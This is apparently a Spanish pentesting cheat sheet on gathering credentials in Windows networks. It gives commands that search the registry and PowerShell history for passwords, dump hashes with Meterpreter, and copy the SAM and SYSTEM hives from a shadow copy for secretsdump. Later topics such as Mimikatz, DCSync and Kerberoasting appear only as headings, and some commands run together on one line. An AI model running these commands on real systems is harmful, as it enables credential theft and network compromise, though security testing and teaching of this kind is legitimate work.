🔑Recolección de Credenciales
Diferentes técnicas con las que obtener credenciales en una red Windows
Archivos en Texto Plano
type %APPDATA%\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txtreg query HKLM /f password /t REG_SZ /s
reg query HKCU /f password /t REG_SZ /sExtraer Credenciales del SAM
Metasploit Hashdump
meterpreter > hashdumpVolume Shadow Copy Service
wmic shadowcopy call create Volume='C:\\'vssadmin list shadowscopy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\sam C:\\users\\Administrator\\Desktop\\sam
copy \\\\?\\GLOBALROOT\\Device\\HarddiskVolumeShadowCopy1\\windows\\system32\\config\\system C:\\users\\Administrator\\Desktop\\systempython3 /opt/impacket/examples/secretsdump.py -sam <sam> -system <system> LOCALRegistry Hives
Extraer Credenciales del LSASS
Sysinternals Suite
Protected LSASS
Windows Credential Manager
Acceder al WCM
Volcar Credenciales Web con PowerShell
RunAs
Mimikatz
Hashes del Domain Controller
Volcado Local (Sin Credenciales)
Volcado Remoto (Con Credenciales)
Ataque DC Sync
Extraer Credenciales del LAPS
Enumerar función LAPS
Obtener Credenciales
Otros Ataques
Kerberoasting
Enumeración
Explotación
AS-REP Roasting
Última actualización